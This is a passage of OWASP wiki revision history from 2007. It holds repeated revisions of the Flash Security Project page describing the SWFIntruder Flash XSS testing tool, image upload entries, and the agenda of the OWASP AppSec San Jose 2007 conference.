test.swf (a simple flawed swf movie) by filling the &quot;Flash Movie Form&quot; with http://YourHost/swfintruderDir/testSwf/test.swf '''or''' download a swf from some host and save it to an accessible path from your web server (http://YourHost/swfDirectory/external.swf).<br /> * Fill the &quot;Flash Movie&quot; form with full URL pointing to the movie (http://YourHost/swfDirectory/test.swf) and click &quot;Load&quot;.<br /> * Wait 1 second for the test movie to be loaded.<br /> * Enjoy browsing the objects.<br /> * Test undefined variables by selecting some of them in the &quot;Undefined Variables&quot; and click 'start' on the Xss window.<br /> * Wait for the test to be finished.<br /> * If some XSS was found, it will be listed in the Xss area click on it to get the result on a new browser window.<br /> <br /> <br /> == Features and Screenshots ==<br /> <br /> * Basic predefined attack patterns.<br /> * Highly customizable attacks.<br /> * Highly customizable undefined variables.<br /> * Semi automated Xss check.<br /> * User configurable internal parameters.<br /> * Log Window for debugging and tracking.<br /> * History of latest 5 tested SWF files.<br /> * ActionScript Objects runtime explorer in tree view.<br /> * Persistent Configuration and Layout.<br /> <br /> == Project Contributors ==<br /> <br /> The Flash Security project is run by Stefano Di Paola. He can be contacted at '''stefano.dipaola AT mindedsecurity.com'''. <br /> <br /> SWFintruder distributions are currently maintained on [[http://code.google.com/p/swfintruder/ Google code]].<br /> <br /> == Project Sponsors ==<br /> <br /> The SWF Intruder project is sponsored by <br /> [http://www.mindedsecurity.com http://www.owasp.org/images/f/fe/MindedLogo.PNG]<br /> <br /> [[Category:OWASP Project]]<br /> [[Category:OWASP Download]]<br /> [[Category:OWASP Tool]]<br /> <br /> __NOTOC__</div> Wisec https://wiki.owasp.org/index.php?title=Category:OWASP_Flash_Security_Project&diff=23817 Category:OWASP Flash Security Project 2007-12-03T00:50:55Z <p>Wisec: /* Project Contributors */</p> <hr /> <div>The OWASP Flash Security Project aims is to produce guidelines and tools around Flash Security<br /> <br /> '''SWFIntruder''' is a tool developed by Stefano Di Paola and maintened by [http://www.owasp.org OWASP] designed to perform a security analysis of Flash applications. <br /> <br /> == SWF Intruder Overview ==<br /> <br /> [[Image:SWFIntruderSnapThumb.jpg|thumb|300px|right|SWFIntruder in action]]<br /> SWFIntruder (pronounced Swiff Intruder) is the first tool specifically <br /> developed for analyzing and testing security of Flash applications at runtime.<br /> It helps to find flaws in Flash applications using the methodology originally <br /> described by Stefano Di Paola in [http://www.owasp.org/images/8/8c/OWASPAppSec2007Milan_TestingFlashApplications.ppt Testing Flash Applications] (May 2007) and in <br /> [http://www.owasp.org/images/d/df/SanJose_AppSec2007_DiPaola.ppt Finding Vulnerabilities in Flash Applications] (Nov 2007).<br /> <br /> SWFIntruder was developed using ActionScript, Html and JavaScript resulting in<br /> a tool taking advantage of the best features of those technologies in order to<br /> get the best capabilities for analysis and interaction with the testing Flash movies.<br /> <br /> SWFIntruder was developed by using only opensource software.<br /> Thanks to its genericity, SWFIntruder is OS indipendant.<br /> <br /> == Goals ==<br /> <br /> SWFIntruder purpose is to analyse a Flash application for version =&lt; 8 and to <br /> help check in a semi automated fashion the presence of security issues like<br /> Cross Site Scripting and Coss Site Flashing.<br /> <br /> Moreover does help raise awareness around the subject of flash <br /> applications security and how that can be used to and assist in the <br /> security of applications. <br /> <br /> == QuickStart ==<br /> <br /> Tested on win32 and a few linux flavours. <br /> Current version is 0.9.<br /> Get it from [http://code.google.com/p/swfintruder/ Google code].<br /> <br /> === Latest Features ===<br /> <br /> Permanent Preferences, Help Topics, ActionScript Object Explorer, Automated Xss testing fully customizable.<br /> <br /> === Video Tutorial ===<br /> <br /> Watch ([http://video.google.it/videoplay?docid=6363609589793955143 medium quality]) or download ([http://www.mindedsecurity.com/labs/fileshare/SWFIntruderTutorial.swf high quality]) the flash tutorial taking you through some basic features of SWFIntruder.<br /> <br /> === Download ===<br /> <br /> You can download the latest version of SWFIntruder from [http://code.google.com/p/swfintruder/ Google code].<br /> <br /> == Requirements ==<br /> <br /> 1. Firefox 2.x [Needed]<br /> 2. FireBug Addon [Suggested]<br /> 3. Flash Player Plugin Ver &gt;= 9 [Needed]<br /> 4. Any Web Server [Needed]<br /> 5. Any OS [Needed :&gt; ]<br /> <br /> == Quick and Dirty Tutorial ==<br /> <br /> * Download SWFIntruder latest version from Google Code.<br /> * Uncompress it and save it somewhere in your websever root directory.<br /> * Browse to http://YourHost/swfintruderDir/.<br /> * Use test.swf (a simple flawed swf movie) by filling the &quot;Flash Movie Form&quot; with http://YourHost/swfintruderDir/testSwf/test.swf '''or''' download a swf from some host and save it to an accessible path from your web server (http://YourHost/swfDirectory/external.swf).<br /> * Fill the &quot;Flash Movie&quot; form with full URL pointing to the movie (http://YourHost/swfDirectory/test.swf) and click &quot;Load&quot;.<br /> * Wait 1 second for the test movie to be loaded.<br /> * Enjoy browsing the objects.<br /> * Test undefined variables by selecting some of them in the &quot;Undefined Variables&quot; and click 'start' on the Xss window.<br /> * Wait for the test to be finished.<br /> * If some XSS was found, it will be listed in the Xss area click on it to get the result on a new browser window.<br /> <br /> <br /> == Features and Screenshots ==<br /> <br /> * Basic predefined attack patterns.<br /> * Highly customizable attacks.<br /> * Highly customizable undefined variables.<br /> * Semi automated Xss check.<br /> * User congurable internal parameters.<br /> * Log Window for debugging and tracking.<br /> * History of latest 5 tested SWF files.<br /> * ActionScript Objects runtime explorer in tree view.<br /> * Persistent Configuration and Layout.<br /> <br /> == Project Contributors ==<br /> <br /> The Flash Security project is run by Stefano Di Paola. He can be contacted at '''stefano.dipaola AT mindedsecurity.com'''. <br /> <br /> SWFintruder distributions are currently maintained on [[http://code.google.com/p/swfintruder/ Google code]].<br /> <br /> == Project Sponsors ==<br /> <br /> The SWF Intruder project is sponsored by <br /> [http://www.mindedsecurity.com http://www.owasp.org/images/f/fe/MindedLogo.PNG]<br /> <br /> [[Category:OWASP Project]]<br /> [[Category:OWASP Download]]<br /> [[Category:OWASP Tool]]<br /> <br /> __NOTOC__</div> Wisec https://wiki.owasp.org/index.php?title=Category:OWASP_Flash_Security_Project&diff=23816 Category:OWASP Flash Security Project 2007-12-03T00:47:18Z <p>Wisec: </p> <hr /> <div>The OWASP Flash Security Project aims is to produce guidelines and tools around Flash Security<br /> <br /> '''SWFIntruder''' is a tool developed by Stefano Di Paola and maintened by [http://www.owasp.org OWASP] designed to perform a security analysis of Flash applications. <br /> <br /> == SWF Intruder Overview ==<br /> <br /> [[Image:SWFIntruderSnapThumb.jpg|thumb|300px|right|SWFIntruder in action]]<br /> SWFIntruder (pronounced Swiff Intruder) is the first tool specifically <br /> developed for analyzing and testing security of Flash applications at runtime.<br /> It helps to find flaws in Flash applications using the methodology originally <br /> described by Stefano Di Paola in [http://www.owasp.org/images/8/8c/OWASPAppSec2007Milan_TestingFlashApplications.ppt Testing Flash Applications] (May 2007) and in <br /> [http://www.owasp.org/images/d/df/SanJose_AppSec2007_DiPaola.ppt Finding Vulnerabilities in Flash Applications] (Nov 2007).<br /> <br /> SWFIntruder was developed using ActionScript, Html and JavaScript resulting in<br /> a tool taking advantage of the best features of those technologies in order to<br /> get the best capabilities for analysis and interaction with the testing Flash movies.<br /> <br /> SWFIntruder was developed by using only opensource software.<br /> Thanks to its genericity, SWFIntruder is OS indipendant.<br /> <br /> == Goals ==<br /> <br /> SWFIntruder purpose is to analyse a Flash application for version =&lt; 8 and to <br /> help check in a semi automated fashion the presence of security issues like<br /> Cross Site Scripting and Coss Site Flashing.<br /> <br /> Moreover does help raise awareness around the subject of flash <br /> applications security and how that can be used to and assist in the <br /> security of applications. <br /> <br /> == QuickStart ==<br /> <br /> Tested on win32 and a few linux flavours. <br /> Current version is 0.9.<br /> Get it from [http://code.google.com/p/swfintruder/ Google code].<br /> <br /> === Latest Features ===<br /> <br /> Permanent Preferences, Help Topics, ActionScript Object Explorer, Automated Xss testing fully customizable.<br /> <br /> === Video Tutorial ===<br /> <br /> Watch ([http://video.google.it/videoplay?docid=6363609589793955143 medium quality]) or download ([http://www.mindedsecurity.com/labs/fileshare/SWFIntruderTutorial.swf high quality]) the flash tutorial taking you through some basic features of SWFIntruder.<br /> <br /> === Download ===<br /> <br /> You can download the latest version of SWFIntruder from [http://code.google.com/p/swfintruder/ Google code].<br /> <br /> == Requirements ==<br /> <br /> 1. Firefox 2.x [Needed]<br /> 2. FireBug Addon [Suggested]<br /> 3. Flash Player Plugin Ver &gt;= 9 [Needed]<br /> 4. Any Web Server [Needed]<br /> 5. Any OS [Needed :&gt; ]<br /> <br /> == Quick and Dirty Tutorial ==<br /> <br /> * Download SWFIntruder latest version from Google Code.<br /> * Uncompress it and save it somewhere in your websever root directory.<br /> * Browse to http://YourHost/swfintruderDir/.<br /> * Use test.swf (a simple flawed swf movie) by filling the &quot;Flash Movie Form&quot; with http://YourHost/swfintruderDir/testSwf/test.swf '''or''' download a swf from some host and save it to an accessible path from your web server (http://YourHost/swfDirectory/external.swf).<br /> * Fill the &quot;Flash Movie&quot; form with full URL pointing to the movie (http://YourHost/swfDirectory/test.swf) and click &quot;Load&quot;.<br /> * Wait 1 second for the test movie to be loaded.<br /> * Enjoy browsing the objects.<br /> * Test undefined variables by selecting some of them in the &quot;Undefined Variables&quot; and click 'start' on the Xss window.<br /> * Wait for the test to be finished.<br /> * If some XSS was found, it will be listed in the Xss area click on it to get the result on a new browser window.<br /> <br /> <br /> == Features and Screenshots ==<br /> <br /> * Basic predefined attack patterns.<br /> * Highly customizable attacks.<br /> * Highly customizable undefined variables.<br /> * Semi automated Xss check.<br /> * User congurable internal parameters.<br /> * Log Window for debugging and tracking.<br /> * History of latest 5 tested SWF files.<br /> * ActionScript Objects runtime explorer in tree view.<br /> * Persistent Configuration and Layout.<br /> <br /> == Project Contributors ==<br /> <br /> The Flash Security project is run by Stefano Di Paola. He can be contacted at '''wisec AT owasp.org'''. <br /> <br /> SWFintruder distributions are currently maintained on [[http://code.google.com/p/swfintruder/ Google code]]. <br /> <br /> If you are interested in volunteering for the project, or have a comment, question, or suggestion, please join the Flash Security<br /> <br /> [http://lists.owasp.org/mailman/listinfo/owasp-flash-security mailing list].<br /> <br /> == Project Sponsors ==<br /> <br /> The SWF Intruder project is sponsored by <br /> [http://www.mindedsecurity.com http://www.owasp.org/images/f/fe/MindedLogo.PNG]<br /> <br /> [[Category:OWASP Project]]<br /> [[Category:OWASP Download]]<br /> [[Category:OWASP Tool]]<br /> <br /> __NOTOC__</div> Wisec https://wiki.owasp.org/index.php?title=File:SWFIntruderSnapThumb.jpg&diff=23804 File:SWFIntruderSnapThumb.jpg 2007-12-02T22:58:10Z <p>Wisec: uploaded a new version of &quot;Image:SWFIntruderSnapThumb.jpg&quot;: Reverted to version as of 17:44, 2 December 2007</p> <hr /> <div>Thumbnail Screenshot of SWFIntruder main window</div> Wisec https://wiki.owasp.org/index.php?title=File:SWFIntruderSnapThumb.jpg&diff=23803 File:SWFIntruderSnapThumb.jpg 2007-12-02T22:57:40Z <p>Wisec: uploaded a new version of &quot;Image:SWFIntruderSnapThumb.jpg&quot;: SWFIntruder Screenshot</p> <hr /> <div>Thumbnail Screenshot of SWFIntruder main window</div> Wisec https://wiki.owasp.org/index.php?title=File:SWFIntruderSnapThumb.jpg&diff=23802 File:SWFIntruderSnapThumb.jpg 2007-12-02T17:44:05Z <p>Wisec: uploaded a new version of &quot;Image:SWFIntruderSnapThumb.jpg&quot;</p> <hr /> <div>Thumbnail Screenshot of SWFIntruder main window</div> Wisec https://wiki.owasp.org/index.php?title=File:SWFIntruderSnapThumb.jpg&diff=23801 File:SWFIntruderSnapThumb.jpg 2007-12-02T17:41:55Z <p>Wisec: uploaded a new version of &quot;Image:SWFIntruderSnapThumb.jpg&quot;: Reverted to version as of 17:25, 2 December 2007</p> <hr /> <div>Thumbnail Screenshot of SWFIntruder main window</div> Wisec https://wiki.owasp.org/index.php?title=File:SWFIntruderSnapThumb.jpg&diff=23800 File:SWFIntruderSnapThumb.jpg 2007-12-02T17:41:44Z <p>Wisec: uploaded a new version of &quot;Image:SWFIntruderSnapThumb.jpg&quot;: Reverted to version as of 17:25, 2 December 2007</p> <hr /> <div>Thumbnail Screenshot of SWFIntruder main window</div> Wisec https://wiki.owasp.org/index.php?title=File:SWFIntruderSnapThumb.jpg&diff=23799 File:SWFIntruderSnapThumb.jpg 2007-12-02T17:33:07Z <p>Wisec: uploaded a new version of &quot;Image:SWFIntruderSnapThumb.jpg&quot;</p> <hr /> <div>Thumbnail Screenshot of SWFIntruder main window</div> Wisec https://wiki.owasp.org/index.php?title=File:SWFIntruderSnapThumb.jpg&diff=23797 File:SWFIntruderSnapThumb.jpg 2007-12-02T17:25:57Z <p>Wisec: Thumbnail Screenshot of SWFIntruder main window</p> <hr /> <div>Thumbnail Screenshot of SWFIntruder main window</div> Wisec https://wiki.owasp.org/index.php?title=7th_OWASP_AppSec_Conference_-_San_Jose_2007/Agenda&diff=23640 7th OWASP AppSec Conference - San Jose 2007/Agenda 2007-11-24T16:42:10Z <p>Wisec: /* OWASP &amp; WASC AppSec 2007 Conference Schedule - Nov 14-15 (San Jose 2007) */</p> <hr /> <div>The agenda for the conference is still under development and is subject to change.<br /> <br /> The [[7th_OWASP_AppSec_Conference_-_San_Jose_2007/Agenda#Nov 14: Track 3: Web Services Security | Web Services Security Track]], which is the 3rd track on Day 1, is at the bottom of this page.<br /> <br /> == OWASP &amp; WASC AppSec 2007 Training Courses - Nov 12th-13th 2007 ==<br /> <br /> The tutorials and the conference itself was held at eBay in San Jose.<br /> <br /> <br /> {| style=&quot;width:80%&quot; border=&quot;0&quot; align=&quot;center&quot;<br /> ! align=&quot;center&quot; style=&quot;background:#4058A0; color:white&quot; | T1. Building and Testing Secure Web Applications<br /> |-<br /> | style=&quot;background:#F2F2F2&quot; | This powerful two-day course focuses on the most common web application security problems, including the OWASP Top Ten. The course will introduce and demonstrate hacking techniques, illustrating how easily application vulnerabilities can be exploited so students really understand how to avoid introducing such vulnerabilities into their code. [[7th_OWASP_AppSec_Conference_-_San_Jose_2007/Training#T1._Building_and_Testing_Secure_Web_Applications_-_2-Day_Course_-_Nov_12-13.2C_2007 | Read more here!]]<br /> |-<br /> ! align=&quot;center&quot; style=&quot;background:#4058A0; color:white&quot; | T2. Secure Coding for Java EE<br /> |-<br /> | style=&quot;background:#F2F2F2&quot; | This Java focused course covers the most common Java EE web application security problems, including the OWASP Top Ten. It teaches Java EE best practices, so developers can really understand how to avoid introducing such vulnerabilities into their Java EE applications. '''This course includes hands on coding exercises that allows the students to fix real flaws in a Java EE application using the best practices recommended in class!!''' [[7th_OWASP_AppSec_Conference_-_San_Jose_2007/Training#T2._Secure_Coding_for_Java_EE_-_2-Day_Course_-_Nov_12-13.2C_2007 | Read more here!]]<br /> |-<br /> ! align=&quot;center&quot; style=&quot;background:#4058A0; color:white&quot; | T3. Secure Coding .NET Web Applications<br /> |-<br /> | style=&quot;background:#F2F2F2&quot; | This .NET focused course covers the most common .NET web application security problems, including the OWASP Top Ten. It teaches .NET best practices, so developers can really understand how to avoid introducing such vulnerabilities into their .NET web applications. '''This course includes hands on coding exercises that allows the students to fix real flaws in a .NET application using the best practices recommended in class!!''' [[7th_OWASP_AppSec_Conference_-_San_Jose_2007/Training#T3._Secure_Coding_.NET_Web_Applications_-_2-Day_Course_-_Nov_12-13.2C_2007 | Read more here!]]<br /> |-<br /> ! align=&quot;center&quot; style=&quot;background:#4058A0; color:white&quot; | T4. Web Services and XML Security<br /> |-<br /> | style=&quot;background:#F2F2F2&quot; | Many enterprises are currently developing new Web Services and/or adding and acquiring Web Services functionality into existing applications -- now is the time to build security into the system! [[7th_OWASP_AppSec_Conference_-_San_Jose_2007/Training#T4._Web_Services_and_XML_Security_-_2-Day_Course_-_Nov_12-13.2C_2007 | Read more here!]]<br /> |-<br /> ! align=&quot;center&quot; style=&quot;background:#4058A0; color:white&quot; | T5. Leveraging OWASP Tools and Documents to Secure Your Enterprise<br /> |-<br /> | style=&quot;background:#F2F2F2&quot; | Apart from OWASP's Top 10, most OWASP projects are not widely used and understood. In most cases this is not due to lack of quality and usefulness of these Document &amp; Tool projects, but due to a lack of understanding of where they fit in an Enterprise's security ecosystem or in the Web Application Development Lifecycle (WADL). This course aims to change that by providing detailed presentations of the most mature and enterprise ready OWASP projects together with practical examples of how to use them. [[7th_OWASP_AppSec_Conference_-_San_Jose_2007/Training#T5._Leveraging_OWASP_Tools_and_Documents_to_Secure_Your_Enterprise_-_2-Day_Course_-_Nov_12-13.2C_2007 | Read more here!]]<br /> |-<br /> ! align=&quot;center&quot; style=&quot;background:#4058A0; color:white&quot; | T6. Open Source ModSecurity Training <br /> |-<br /> | style=&quot;background:#F2F2F2&quot; | ModSecurity is currently the most widely deployed web application firewall (WAF) product. This two-day class is for those people who want to learn how to build, deploy, and use ModSecurity in the most effective manner. The course will cover the open source ModSecurity Console, which helps manage alerts on suspicious web activity targeting your web servers. The course also provides an in-depth look at the extremely powerful ModSecurity Rules Language. [[7th_OWASP_AppSec_Conference_-_San_Jose_2007/Training#T6._Open_Source_ModSecurity_Training_-_2-Day_Course_-_Nov_12-13.2C_2007 | Read more here!]]<br /> |}<br /> <br /> November 12th - Cenzic is sponsoring a cocktail party at the eBay facility after the first day of training.<br /> <br /> == Tech Expo - Nov 13th-14th ==<br /> <br /> Product vendors demonstrated their application security products to conference attendees for the first time at this OWASP Conference. The focus of this expo was on the technical details of the technologies they are offering in the market to help organizations deal with their application security issues.<br /> <br /> The technology expo was held:<br /> * November 13th: From 12-2, with lunch included for all the OWASP tutorial attendees who will be invited to attend the expo.<br /> * November 14th: From 11-6 during the first day of the OWASP conference. <br /> <br /> '''Breach Cocktail Party - Nov 13'''<br /> <br /> To close out the training event and the first day of the tech expo, Breach kindly agreed to arrange a cocktail party on Tuesday evening. They sponsored a similar event at Black Hat for a joint OWASP / WASC get together and it was a roaring success with over 300 attendees. These have always been great events at previous conferences. For more details and RSVP go to: http://www.breach.com/breach_security_party_owaspwasc_san_jose.html<br /> <br /> == OWASP &amp; WASC AppSec 2007 Conference Schedule - Nov 14-15 (San Jose 2007) ==<br /> <br /> {| style=&quot;width:80%&quot; border=&quot;0&quot; align=&quot;center&quot;<br /> ! colspan=&quot;3&quot; align=&quot;center&quot; style=&quot;background:#4058A0; color:white&quot; | Day 1 - Nov 14, 2007<br /> |-<br /> | style=&quot;width:10%; background:#7B8ABD&quot; | || style=&quot;width:40%; background:#BC857A&quot; | Track 1: <br /> | style=&quot;width:40%; background:#BCA57A&quot; | Track 2: <br /> |-<br /> | style=&quot;width:10%; background:#7B8ABD&quot; | 08:00-09:00 || colspan=&quot;2&quot; style=&quot;width:80%; background:#C2C2C2&quot; align=&quot;left&quot; | Registration and Coffee<br /> |-<br /> | style=&quot;width:10%; background:#7B8ABD&quot; | 09:00-09:10 || colspan=&quot;2&quot; style=&quot;width:80%; background:#F2F2F2&quot; align=&quot;left&quot; | Welcome to OWASP &amp; WASC AppSec 2007 Conference: Dave Wichers, OWASP Conferences Chair and COO Aspect Security ([http://www.owasp.org/images/e/e7/OWASP-WASCAppSec2007SanJose_Intro-Final.ppt ppt])<br /> |-<br /> | style=&quot;width:10%; background:#7B8ABD&quot; | 09:10-10:00 || colspan=&quot;2&quot; style=&quot;width:80%; background:#F2F2F2&quot; align=&quot;left&quot; | Keynote: eBay Application Security Program – Dave Cullinane, CISO - eBay and Michael Barrett, CISO - PayPal [Softcopy not available]<br /> |-<br /> | style=&quot;width:10%; background:#7B8ABD&quot; | 10:00-10:30 || colspan=&quot;2&quot; style=&quot;width:80%; background:#F2F2F2&quot; align=&quot;left&quot; | An Introduction to WASC and its projects ([http://www.owasp.org/images/1/1d/OWASP-WASCAppSec2007SanJose_WASCIntro.pdf pdf])– Jeremiah Grossman, CTO, WhiteHat Security<br /> |-<br /> | style=&quot;width:10%; background:#7B8ABD&quot; | 10:30-11:00 || colspan=&quot;2&quot; style=&quot;width:80%; background:#F2F2F2&quot; align=&quot;left&quot; | Using OWASP ([http://www.owasp.org/downloads/Using_OWASP.ppt VERY LARGE - 66MB - ppt]), Jeff Williams, OWASP Chair and CEO - Aspect Security<br /> |-<br /> | style=&quot;width:10%; background:#7B8ABD&quot; | 11:00-11:20 || colspan=&quot;2&quot; style=&quot;width:80%; background:#C2C2C2&quot; align=&quot;left&quot; | Break<br /> |-<br /> | style=&quot;width:10%; background:#7B8ABD&quot; | 11:20-12:20 || style=&quot;width:40%; background:#BC857A&quot; align=&quot;left&quot; | For my next trick... hacking Web 2.0 (lite) – Petko D. Petkov (AKA PDP Architect), Senior Security Researcher. Full version presented at OWASP Day Sept 2007 in Brussels ([http://www.owasp.org/images/0/02/OWASP_Day_Belgium_2007-pdp.ppt ppt])<br /> | style=&quot;width:40%; background:#BCA57A&quot; align=&quot;left&quot; | Backdoors and other Developer Introduced 'Features', Chris Wysopal, CTO Veracode<br /> |-<br /> | style=&quot;width:10%; background:#7B8ABD&quot; | 12:20-13:45 || colspan=&quot;2&quot; style=&quot;width:80%; background:#C2C2C2&quot; align=&quot;left&quot; | Lunch<br /> |-<br /> | style=&quot;width:10%; background:#7B8ABD&quot; | 13:45-14:30 || style=&quot;width:40%; background:#BC857A&quot; align=&quot;left&quot; | CSRF: Danger, Detection, and Defenses – Introducing two new OWASP CSRF Tools, Eric Sheridan, Application Security Consultant, Aspect Security and OWASP CSRF Guard Project Lead ([http://www.owasp.org/images/c/c9/CSRF_DangerDetectionDefenses.ppt ppt])<br /> | style=&quot;width:40%; background:#BCA57A&quot; align=&quot;left&quot; | WASC Distributed Open Proxy Honeypot Project, Ryan Barnett, WASC Open Proxy Honeypot Project Lead, Breach Security<br /> |-<br /> | style=&quot;width:10%; background:#7B8ABD&quot; | 14:30-15:10 || style=&quot;width:40%; background:#BC857A&quot; align=&quot;left&quot; | Defeating Web 2.0 Attacks without Recoding Applications, Amichai Shulman ([http://www.owasp.org/images/4/41/OWASP-WASCAppSec2007SanJose_DefeatWeb2.0Attacks.ppt ppt]), CTO, Imperva<br /> | style=&quot;width:40%; background:#BCA57A&quot; align=&quot;left&quot; | Dangers of Third Party Content, Tom Stripling, Senior Security Consultant - Security PS ([http://www.owasp.org/images/6/6d/OWASP-WASCAppSec2007SanJose_Dangers_of3rdPartyContent.ppt ppt])<br /> |-<br /> | style=&quot;width:10%; background:#7B8ABD&quot; | 15:10-15:30 || colspan=&quot;2&quot; style=&quot;width:80%; background:#C2C2C2&quot; align=&quot;left&quot; | Break<br /> |-<br /> | style=&quot;width:10%; background:#7B8ABD&quot; | 15:30-16:40 || style=&quot;width:40%; background:#BC857A&quot; align=&quot;left&quot; | OWASP Projects Overview, Dinis Cruz, Chief OWASP Evangelist<br /> | style=&quot;width:40%; background:#BCA57A&quot; align=&quot;left&quot; | Web Browser (In)-Security - &quot;Past, Present, and Future&quot;, Robert &quot;RSnake&quot; Hansen, CEO SecTheory<br /> |-<br /> | style=&quot;width:10%; background:#7B8ABD&quot; | 16:40-17:00 || colspan=&quot;2&quot; style=&quot;width:80%; background:#C2C2C2&quot; align=&quot;left&quot; | Break<br /> |-<br /> | style=&quot;width:10%; background:#7B8ABD&quot; | 17:00-18:00 || colspan=&quot;2&quot; style=&quot;width:40%; background:#F2F2F2&quot; align=&quot;left&quot; | Panel: “Building an Effective Application Security Assurance Program”<br /> Moderator: Brian Bertacini, Sr. Manager, AppSec Consulting<br /> <br /> Panelists: Jeff Williams - CEO Aspect Security, Andy Steingruebl - Principal Security Engineer PayPal, Gary Terrell, Adobe Systems, Scott Stender, iSEC Partners, Neil Daswani, Google<br /> |-<br /> | style=&quot;width:10%; background:#7B8ABD&quot; | 18:00-19:00 || colspan=&quot;2&quot; style=&quot;width:80%; background:#C2C2C2&quot; align=&quot;left&quot; | OWASP Leader Meeting [[7th_OWASP_AppSec_Conference_-_San_Jose_2007_/_OWASP_Leaders_Meeting_-_Nov_14_6pm|(see meeting agenda here)]] - Organized by Dinis Cruz<br /> |-<br /> | style=&quot;width:10%; background:#7B8ABD&quot; | 19:00-21:00 || colspan=&quot;2&quot; style=&quot;width:80%; background:#C2C2C2&quot; align=&quot;left&quot; | OWASP Social Gathering: Dinner and Drinks at Holiday Inn. (1740 N. 1st St. San Jose)<br /> |-<br /> ! colspan=&quot;3&quot; align=&quot;center&quot; style=&quot;background:#4058A0; color:white&quot; | Day 2 - Nov 15, 2007<br /> |-<br /> | style=&quot;width:10%; background:#7B8ABD&quot; | || style=&quot;width:40%; background:#BC857A&quot; | Track 1: <br /> | style=&quot;width:40%; background:#BCA57A&quot; | Track 2: <br /> |-<br /> | style=&quot;width:10%; background:#7B8ABD&quot; | 08:00-09:00 || colspan=&quot;2&quot; style=&quot;width:80%; background:#C2C2C2&quot; align=&quot;left&quot; | Coffee<br /> |-<br /> | style=&quot;width:10%; background:#7B8ABD&quot; | 09:00-9:50 || colspan=&quot;2&quot; style=&quot;width:80%; background:#F2F2F2&quot; align=&quot;left&quot; | Keynote: DTCC Application Security Program ([http://www.owasp.org/images/a/af/OWASP-WASCAppSec2007SanJose_AppSecDTCC.ppt ppt]), Jim Routh, CISO for the Depository Trust and Clearing Corporation (DTCC)<br /> |-<br /> | style=&quot;width:10%; background:#7B8ABD&quot; | 9:50-10:30 || colspan=&quot;2&quot; style=&quot;width:80%; background:#F2F2F2&quot; align=&quot;left&quot; | OWASP State of the Union ([http://www.owasp.org/images/e/e9/OWASP-WASCAppSec2007SanJose_OWASPStateoftheU.ppt ppt]), Dinis Cruz, Chief OWASP Evangelist<br /> |-<br /> | style=&quot;width:10%; background:#7B8ABD&quot; | 10:30-10:50 || colspan=&quot;2&quot; style=&quot;width:80%; background:#C2C2C2&quot; align=&quot;left&quot; | Break<br /> |-<br /> | style=&quot;width:10%; background:#7B8ABD&quot; | 10:50-11:30 || style=&quot;width:40%; background:#BC857A&quot; align=&quot;left&quot; | Finding Vulnerabilities in Flash Applications, Stefano Di Paola, CTO Minded Security ([http://www.owasp.org/images/d/df/SanJose_AppSec2007_DiPaola.ppt ppt])<br /> | style=&quot;width:40%; background:#BCA57A&quot; align=&quot;left&quot; | Start Rolling with Rails Security, Corey Benninger, Principal Consultant, Intrepidus Group, Inc.<br /> |-<br /> | style=&quot;width:10%; background:#7B8ABD&quot; | 11:30-12:30 || style=&quot;width:40%; background:#BC857A&quot; align=&quot;left&quot; | OWASP Enterprise Security API (ESAPI) – Jeff Williams, CEO Aspect Security and OWASP Chair ([http://www.owasp.org/images/4/45/OWASP-WASCAppSec2007SanJose_OWASP_ESAPI_Overview.ppt ppt])<br /> | style=&quot;width:40%; background:#BCA57A&quot; align=&quot;left&quot; | Securing Java Server Faces against the OWASP Top 10 ([http://www.owasp.org/images/0/0d/OWASP-WASCAppSec2007SanJose_SecuringJSFApps_OWASPTop10.ppt ppt]), David Chandler, Web Architect, Digital Insight<br /> |-<br /> | style=&quot;width:10%; background:#7B8ABD&quot; | 12:30-13:45 || colspan=&quot;2&quot; style=&quot;width:80%; background:#C2C2C2&quot; align=&quot;left&quot; | Lunch<br /> |-<br /> | style=&quot;width:10%; background:#7B8ABD&quot; | 13:45-14:30 || style=&quot;width:40%; background:#BC857A&quot; align=&quot;left&quot; | The MySpace Worm, by its author: Samy Kamkar ([http://www.owasp.org/images/7/79/OWASP-WASCAppSec2007SanJose_SamyWorm.ppt ppt])<br /> | style=&quot;width:40%; background:#BCA57A&quot; align=&quot;left&quot; | .Net Web Services Hacking - Scan, Attacks and Defense, Sheeraj Shah, Blueinfy<br /> |-<br /> | style=&quot;width:10%; background:#7B8ABD&quot; | 14:30-15:20 || style=&quot;width:40%; background:#BC857A&quot; align=&quot;left&quot; | OWASP SpoC Project: Anti Samy - Picking a Fight with XSS ([http://www.owasp.org/images/e/e9/OWASP-WASCAppSec2007SanJose_AntiSamy.ppt ppt]), Arshan Dabirsiaghi, Application Security Engineer, Aspect Security<br /> | style=&quot;width:40%; background:#BCA57A&quot; align=&quot;left&quot; | Website Vulnerability Statistics, Arian Evans (Director of Operations, WhiteHat Security)<br /> |-<br /> | style=&quot;width:10%; background:#7B8ABD&quot; | 15:20-15:40 || colspan=&quot;2&quot; style=&quot;width:80%; background:#C2C2C2&quot; align=&quot;left&quot; | Break<br /> |-<br /> | style=&quot;width:10%; background:#7B8ABD&quot; | 15:40-16:30 || style=&quot;width:40%; background:#BC857A&quot; align=&quot;left&quot; | The PKI Lie – Attacking Certificate-Based Authentication ([http://www.owasp.org/images/c/c4/OWASP-WASCAppSec2007SanJose_PKILie.ppt ppt]), Ofer Maor, CTO Hacktics<br /> | style=&quot;width:40%; background:#BCA57A&quot; align=&quot;left&quot; | Session Management Security and Assessment Techniques, Tom Stracener, Sr. Security Analyst, Cenzic<br /> |-<br /> | style=&quot;width:10%; background:#7B8ABD&quot; | 16:30-17:30 || style=&quot;width:40%; background:#F2F2F2&quot; align=&quot;left&quot; | Panel: Responsible &quot;Website&quot; Vulnerability Disclosure<br /> Moderator: Anurag Agarwal<br /> <br /> Panelists: Robert &quot;RSnake&quot; Hansen, CEO SecTheory; Bruce Lowenthal, Director of Oracle Security Alerts Group, Oracle; Zulfikar Ramzan, Advanced Threat Team, Symantec; Christopher Ernst, US Secret Service; and Katie Moussouris, Security Strategist, Microsoft<br /> | style=&quot;width:40%; background:#F2F2F2&quot; align=&quot;left&quot; | Panel: Outsourcing: Financial Dream or Security Nightmare?<br /> Moderator: Rohyt Belani, Managing Partner, Intrepidus Group<br /> <br /> Panelists: Claire McDonough - Security Program Manager at Google, Renato Delatorre – Director of Network Security &amp; Risk Management for Verizon Wireless, Jaswinder Hayre - Application Security Manager for HBO<br /> |-<br /> | style=&quot;width:10%; background:#7B8ABD&quot; | 17:30-17:45 || colspan=&quot;2&quot; style=&quot;width:40%; background:#F2F2F2&quot; align=&quot;left&quot; | Conference Wrap Up - Dave Wichers, 